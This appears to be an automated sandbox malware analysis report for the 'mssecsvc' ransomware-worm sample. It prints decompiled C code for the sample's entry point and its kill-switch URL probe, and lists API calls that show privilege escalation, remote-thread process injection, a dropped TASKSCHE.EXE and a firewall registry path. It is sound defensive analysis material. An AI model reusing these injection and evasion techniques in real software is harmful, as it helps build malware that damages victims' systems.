                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Section$ChangeCloseFindNotificationOpenView
                                                                                • String ID:
                                                                                • API String ID: 1694706092-0
                                                                                • Opcode ID: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                                                                                • Instruction ID: 145636fd03ff67e7fbb2180c05d61f0a0de84b1f73a5b83d74b92730fac800b9
                                                                                • Opcode Fuzzy Hash: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                                                                                • Instruction Fuzzy Hash: 87212C70B00546BBDF24DF25CC56FA973A9EF90744F400168F9198E2E4DBB1AE24C718
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                control_flow_graph 277 b91422-b91474 LookupPrivilegeValueA NtAdjustPrivilegesToken
                                                                                APIs
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00B9145A
                                                                                • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00B9146A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                • String ID:
                                                                                • API String ID: 3615134276-0
                                                                                • Opcode ID: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
                                                                                • Instruction ID: ddbff97e699881e74d61e2820170bd54818263a6fff0c1519b9bac5ac29647fb
                                                                                • Opcode Fuzzy Hash: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
                                                                                • Instruction Fuzzy Hash: 5BF0AE36542510BBD7205F56CD8EED77F28EF533A0F144556F4484E151C2624BA5D3F4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                control_flow_graph 278 b92477-b924ad NtProtectVirtualMemory NtWriteVirtualMemory
                                                                                APIs
                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 00B9249B
                                                                                • NtWriteVirtualMemory.NTDLL ref: 00B924A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MemoryVirtual$ProtectWrite
                                                                                • String ID:
                                                                                • API String ID: 151266762-0
                                                                                • Opcode ID: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                                                                                • Instruction ID: 6bbb67ea70d6ee96dfa5f1d7b4d314b28acc786a60d934acbd3f762ecc45b662
                                                                                • Opcode Fuzzy Hash: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                                                                                • Instruction Fuzzy Hash: 2AE012E07502007FF5185F55DC5FF7B391DDB41751F410208FA0A981C4F9A15E18467A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                control_flow_graph 279 b9144a-b91474 LookupPrivilegeValueA NtAdjustPrivilegesToken
                                                                                APIs
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00B9145A
                                                                                • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00B9146A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                • String ID:
                                                                                • API String ID: 3615134276-0
                                                                                • Opcode ID: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                                                                                • Instruction ID: ee32c209e3d0a2de55b6acbdbca8a3d00d8b73f2470e3acbbab87dcaf3c2c19a
                                                                                • Opcode Fuzzy Hash: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                                                                                • Instruction Fuzzy Hash: F2D06731643034BBD6312A568C0EEE77D1DEF577A0F015041F9089A1A1C5A28EA1C7F5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                control_flow_graph 146 409a16-409a8b __set_app_type __p__fmode __p__commode call 409ba1 149 409a99-409af0 call 409b8c _initterm __getmainargs _initterm 146->149 150 409a8d-409a98 __setusermatherr 146->150 153 409af2-409afa 149->153 154 409b2c-409b2f 149->154 150->149 157 409b00-409b03 153->157 158 409afc-409afe 153->158 155 409b31-409b35 154->155 156 409b09-409b0d 154->156 155->154 160 409b13-409b24 GetStartupInfoA 156->160 161 409b0f-409b11 156->161 157->156 159 409b05-409b06 157->159 158->153 158->157 159->156 162 409b26-409b2a 160->162 163 409b37-409b39 160->163 161->159 161->160 164 409b3a-409b45 GetModuleHandleA call 408140 162->164 163->164 166 409b4a-409b67 exit _XcptFilter 164->166
                                                                                C-Code - Quality: 71%
                                                                                			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                                                				CHAR* _v8;
                                                                                				intOrPtr* _v24;
                                                                                				intOrPtr _v28;
                                                                                				struct _STARTUPINFOA _v96;
                                                                                				int _v100;
                                                                                				char** _v104;
                                                                                				int _v108;
                                                                                				void _v112;
                                                                                				char** _v116;
                                                                                				intOrPtr* _v120;
                                                                                				intOrPtr _v124;
                                                                                				void* _t27;
                                                                                				intOrPtr _t36;
                                                                                				signed int _t38;
                                                                                				int _t40;
                                                                                				intOrPtr* _t41;
                                                                                				intOrPtr _t42;
                                                                                				intOrPtr _t49;
                                                                                				intOrPtr* _t55;
                                                                                				intOrPtr _t58;
                                                                                				intOrPtr _t61;
                                                                                
                                                                                				_push(0xffffffff);
                                                                                				_push(0x40a1a0);
                                                                                				_push(0x409ba2);
                                                                                				_push( *[fs:0x0]);
                                                                                				 *[fs:0x0] = _t58;
                                                                                				_v28 = _t58 - 0x68;
                                                                                				_v8 = 0;
                                                                                				__set_app_type(2);
                                                                                				 *0x70f894 =  *0x70f894 | 0xffffffff;
                                                                                				 *0x70f898 =  *0x70f898 | 0xffffffff;
                                                                                				 *(__p__fmode()) =  *0x70f88c;
                                                                                				 *(__p__commode()) =  *0x70f888;
                                                                                				 *0x70f890 = _adjust_fdiv;
                                                                                				_t27 = E00409BA1( *_adjust_fdiv);
                                                                                				_t61 =  *0x431410; // 0x1
                                                                                				if(_t61 == 0) {
                                                                                					__setusermatherr(E00409B9E);
                                                                                				}
                                                                                				E00409B8C(_t27);
                                                                                				_push(0x40b010);
                                                                                				_push(0x40b00c);
                                                                                				L00409B86();
                                                                                				_v112 =  *0x70f884;
                                                                                				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
                                                                                				_push(0x40b008);
                                                                                				_push(0x40b000); // executed
                                                                                				L00409B86(); // executed
                                                                                				_t55 =  *_acmdln;
                                                                                				_v120 = _t55;
                                                                                				if( *_t55 != 0x22) {
                                                                                					while( *_t55 > 0x20) {
                                                                                						_t55 = _t55 + 1;
                                                                                						_v120 = _t55;
                                                                                					}
                                                                                				} else {
                                                                                					do {
                                                                                						_t55 = _t55 + 1;
                                                                                						_v120 = _t55;
                                                                                						_t42 =  *_t55;
                                                                                					} while (_t42 != 0 && _t42 != 0x22);
                                                                                					if( *_t55 == 0x22) {
                                                                                						L6:
                                                                                						_t55 = _t55 + 1;
                                                                                						_v120 = _t55;
                                                                                					}
                                                                                				}
                                                                                				_t36 =  *_t55;
                                                                                				if(_t36 != 0 && _t36 <= 0x20) {
                                                                                					goto L6;
                                                                                				}
                                                                                 				// nShowCmd: use wShowWindow only when STARTF_USESHOWWINDOW (0x1) is set,
                                                                                 				// otherwise SW_SHOWDEFAULT (10).
                                                                                 				_v96.dwFlags = 0;
                                                                                 				GetStartupInfoA( &_v96);
                                                                                 				if((_v96.dwFlags & 0x00000001) == 0) {
                                                                                 					_t38 = 0xa;
                                                                                 				} else {
                                                                                 					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                                                 				}
                                                                                 				// WinMain(hInstance, NULL, lpCmdLine, nShowCmd): E00408140 is the kill-switch
                                                                                 				// probe listed further down in this report. exit() does not return.
                                                                                 				_push(_t38);
                                                                                 				_push(_t55);
                                                                                 				_push(0);
                                                                                 				_push(GetModuleHandleA(0));
                                                                                 				_t40 = E00408140();
                                                                                 				_v108 = _t40;
                                                                                 				exit(_t40);
                                                                                 				// CRT __except path (the API ID of this entry names an Xcpt filter): the
                                                                                 				// exception code and the EXCEPTION_POINTERS block are passed to L00409B80.
                                                                                 				_t41 = _v24;
                                                                                 				_t49 =  *((intOrPtr*)( *_t41));
                                                                                 				_v124 = _t49;
                                                                                 				_push(_t41);
                                                                                 				_push(_t49);
                                                                                 				L00409B80();
                                                                                 				return _t41;
                                                                                			}

                                                                                Instruction addresses for the listing above: 0x00409a19 to 0x00409b67 (the per-line address column of the report is not reproduced here).

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.663260796.0000000000409000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.663184131.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.663214895.0000000000401000.00000080.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.663302461.000000000040A000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.663328344.000000000040B000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.663379016.000000000040F000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.663454036.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.663555779.0000000000710000.00000080.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.665288410.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                • String ID:
                                                                                • API String ID: 801014965-0
                                                                                • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                                                • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
                                                                                • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                                                • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                Control-flow graph for the function at 00B907AC (rendered as an image in the report; only the node list survives extraction). Main path per the graph edges: a subcall to 00B9144A, FreeLibrary and FindCloseChangeNotification, CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS) with a Process32First/Process32Next loop, OpenProcess on the matching entry, a subcall to 00B92574, CreateRemoteThread, then the Sleep loop at 00B905BA before the handle is closed and enumeration continues. The remaining nodes (00B905A9 to 00B907A3) call SetProcessAffinityMask, lstrcpyW, lstrcatW, NtMapViewOfSection, NtOpenProcessToken and the subcalls 00B90305, 00B9115D and 00B907AC.
                                                                                APIs
                                                                                  • Part of subcall function 00B9144A: LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00B9145A
                                                                                  • Part of subcall function 00B9144A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00B9146A
                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00B905AD
                                                                                • FreeLibrary.KERNEL32(73E60000,?,00B9079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B907B8
                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,00B9079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B907BF
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B907C9
                                                                                • Process32First.KERNEL32 ref: 00B907DC
                                                                                • Process32Next.KERNEL32 ref: 00B907ED
                                                                                • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B90805
                                                                                • CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00B90842
                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B9085D
                                                                                • FindCloseChangeNotification.KERNELBASE ref: 00B9086C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ChangeCloseFindNotification$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
                                                                                • String ID: csrs
                                                                                • API String ID: 238827593-2321902090
                                                                                • Opcode ID: cb63e8b7f3a99e4be573476feab88a83968f02cd0365d5f729e494595204ac2c
                                                                                • Instruction ID: 443d1d48afbaf0e1edeccc3bb929a005ee6fe5b36196ef6723c459044b540bbc
                                                                                • Opcode Fuzzy Hash: cb63e8b7f3a99e4be573476feab88a83968f02cd0365d5f729e494595204ac2c
                                                                                • Instruction Fuzzy Hash: 76113030611205BFEF256F21CC8EBBF3AADEF54711F0000BCF94A99091D6B49F019A6A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 92%
                                                                                			E00408140() {
                                                                                				char* _v1;
                                                                                				char* _v3;
                                                                                				char* _v7;
                                                                                				char* _v11;
                                                                                				char* _v15;
                                                                                				char* _v19;
                                                                                				char* _v23;
                                                                                				void _v80;
                                                                                				char _v100;
                                                                                				char* _t12;
                                                                                				void* _t13;
                                                                                				void* _t27;

                                                                                				// Kill-switch URL (56 characters) copied onto the stack as 0xe dwords via rep movsd,
                                                                                				// with the terminating NUL (byte 57) supplied by the trailing movsb.
                                                                                				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
                                                                                				asm("movsb");
                                                                                				// Decompiler artefact: these stores zero the remaining locals and the InternetOpenA
                                                                                				// arguments (the API list below records all of them as 0 except dwAccessType).
                                                                                				_v23 = _t12;
                                                                                				_v19 = _t12;
                                                                                				_v15 = _t12;
                                                                                				_v11 = _t12;
                                                                                				_v7 = _t12;
                                                                                				_v3 = _t12;
                                                                                				_v1 = _t12;
                                                                                				// InternetOpenA(NULL agent, INTERNET_OPEN_TYPE_DIRECT (1), NULL, NULL, 0)
                                                                                				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
                                                                                				_t27 = _t13;
                                                                                				// dwFlags 0x84000000 = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE: the probe
                                                                                				// must hit the network and can never be satisfied from the WinINet cache.
                                                                                				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
                                                                                				InternetCloseHandle(_t27); // executed
                                                                                				// The listing shows no branch on the InternetOpenUrlA result; the handle closed here
                                                                                				// is 0 (see InternetCloseHandle(00000000), ref 004081AB), i.e. the probe returned no
                                                                                				// handle in this run, and E00408090 (which per the subcall APIs reads its own module
                                                                                				// path and argc) runs next.
                                                                                				InternetCloseHandle(0);
                                                                                				E00408090();
                                                                                				return 0;
                                                                                			}

                                                                                Instruction addresses for the listing above: 0x00408155 to 0x004081b9 (the per-line address column of the report is not reproduced here).

                                                                                APIs
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
                                                                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
                                                                                • InternetCloseHandle.WININET(00000000), ref: 004081A7
                                                                                • InternetCloseHandle.WININET(00000000), ref: 004081AB
                                                                                  • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                                                                                  • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
                                                                                Strings
                                                                                • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.663214895.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.663184131.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.663260796.0000000000409000.00000040.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.663302461.000000000040A000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.663328344.000000000040B000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.663379016.000000000040F000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.663454036.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.663555779.0000000000710000.00000080.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.665288410.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
                                                                                • String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                                                                                • API String ID: 774561529-2942426231
                                                                                • Opcode ID: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                                                                                • Instruction ID: cdf7c9b464921ed547f6e9cf97b0948ff8b518ee0850ecae1f57fc3afa3cefd0
                                                                                • Opcode Fuzzy Hash: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                                                                                • Instruction Fuzzy Hash: D20186719543106EE310DF348C05B6BBBE9EF85710F01082EF984F7280E6B59804876B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                Control-flow graph for the function at 7FEA4499 (rendered as an image in the report; only the node list survives extraction): GetFileAttributesA with SetFileAttributesA on one branch, then CreateFileA, CreateFileMappingA and MapViewOfFile, each followed by a failure exit.
                                                                                APIs
                                                                                • GetFileAttributesA.KERNELBASE(?,65676E61,?,?,7FEA4406,?,7FEA43E8,?,7FEA43C4), ref: 7FEA44A4
                                                                                • SetFileAttributesA.KERNELBASE(?,00000000,?,65676E61,?,?,7FEA4406,?,7FEA43E8,?,7FEA43C4), ref: 7FEA44B8
                                                                                • CreateFileA.KERNELBASE(?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61,?,?,7FEA4406,?,7FEA43E8,?,7FEA43C4), ref: 7FEA44ED
                                                                                • CreateFileMappingA.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61), ref: 7FEA4565
                                                                                • MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61), ref: 7FEA459A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesCreate$MappingView
                                                                                • String ID:
                                                                                • API String ID: 1961427682-0
                                                                                • Opcode ID: a597af1445ea8736db27a55b35799f807b5cdfd84ba473e7882835a9cfdd7254
                                                                                • Instruction ID: 5241e261c6a8b1a9cf08daa61a461fa69fc83fe37cd40be9c894cf7c8eac2c63
                                                                                • Opcode Fuzzy Hash: a597af1445ea8736db27a55b35799f807b5cdfd84ba473e7882835a9cfdd7254
                                                                                • Instruction Fuzzy Hash: E62112B0205309BFEF219E658D45BFA366DAF01619F500229E91A9E0A4D7F5AF058728
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph (rendered image not reproduced): basic blocks b905ba-b905bd, b905bf-b905c7 (Sleep) and b905c9; block b905ba-b905bd branches either to b905c9 or to the Sleep block, and the Sleep block jumps back to b905ba-b905bd, forming a Sleep loop.
                                                                                APIs
                                                                                • Sleep.KERNELBASE(0000000A,00B9085C,?,00000000,00000000,-00003C38,00000002,00000000,?,00000000), ref: 00B905C1
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 3c1f989dfd13240381299ec7adf5382b251643946d8aa86ca05208ab7bb78418
                                                                                • Instruction ID: e135fb134d8ba9db73add7f697db003abd3a6b7b4cc90aaea62a277f5739f2b8
                                                                                • Opcode Fuzzy Hash: 3c1f989dfd13240381299ec7adf5382b251643946d8aa86ca05208ab7bb78418
                                                                                • Instruction Fuzzy Hash: F8B012382503009DDE14392044CEB0416E47F11B11FE100F9E2064C0C407E407001D09
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,00000104), ref: 7FEA3CA1
                                                                                • GetProcAddress.KERNEL32(00000000,00000002), ref: 7FEA3CD4
                                                                                • GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                                                                                • GetTickCount.KERNEL32 ref: 7FEA3D93
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,000000C8), ref: 7FEA3EE2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 1749273276-4180491618
                                                                                • Opcode ID: 11d8e70a6ae69d735f2b35264cad3f706a3a81fbd19f45a2bd40c521d43324e7
                                                                                • Instruction ID: 6856dd48e4ced1a9f2286be03aa6e2628cc93b41bccce76cbf3563a38adebb89
                                                                                • Opcode Fuzzy Hash: 11d8e70a6ae69d735f2b35264cad3f706a3a81fbd19f45a2bd40c521d43324e7
                                                                                • Instruction Fuzzy Hash: 10020571419348BFEB229F748C4ABEA7BACEF41304F004559EC4A9E081D7F66F4597A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,00000104), ref: 00B93CA1
                                                                                • GetProcAddress.KERNEL32(00000000,00000002), ref: 00B93CD4
                                                                                • GetProcAddress.KERNEL32(00000000,00B93D41), ref: 00B93D4C
                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B93D5F
                                                                                • GetTickCount.KERNEL32 ref: 00B93D93
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00B96EF6,00000000,00000000,00000000,00000000), ref: 00B93E65
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,000000C8), ref: 00B93EE2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 1749273276-4180491618
                                                                                • Opcode ID: 11d8e70a6ae69d735f2b35264cad3f706a3a81fbd19f45a2bd40c521d43324e7
                                                                                • Instruction ID: 5aaf2a18cdc2c8cb1b98dfdf0ceeb045181aa75daaead9e4e1659f2d8af62cae
                                                                                • Opcode Fuzzy Hash: 11d8e70a6ae69d735f2b35264cad3f706a3a81fbd19f45a2bd40c521d43324e7
                                                                                • Instruction Fuzzy Hash: 1A020571418258BFEF259F248C4ABEA7BECEF41700F0045A9EC499E082D7F45F4687A6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(7FEA3CBA), ref: 7FEA3CC2
                                                                                • GetProcAddress.KERNEL32(00000000,00000002), ref: 7FEA3CD4
                                                                                • GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                                                                                • GetTickCount.KERNEL32 ref: 7FEA3D93
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$CountHandleLibraryLoadModuleTick
                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 2837544101-4180491618
                                                                                • Opcode ID: a6ecbdba0e77da1c42fb1fb22e58a019832077429085a03e12af027fb64ba546
                                                                                • Instruction ID: b4b3212d39e947ac5d9392814a2c7224f35c85923ea667b823aff5088932c5b3
                                                                                • Opcode Fuzzy Hash: a6ecbdba0e77da1c42fb1fb22e58a019832077429085a03e12af027fb64ba546
                                                                                • Instruction Fuzzy Hash: 45E11371519348BFEB229F708C4ABFA7BACEF41304F004559EC4A9E081D6F66F059762
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00B93CBA), ref: 00B93CC2
                                                                                • GetProcAddress.KERNEL32(00000000,00000002), ref: 00B93CD4
                                                                                • GetProcAddress.KERNEL32(00000000,00B93D41), ref: 00B93D4C
                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B93D5F
                                                                                • GetTickCount.KERNEL32 ref: 00B93D93
                                                                                Strings
                                                                                Memory Dump Source
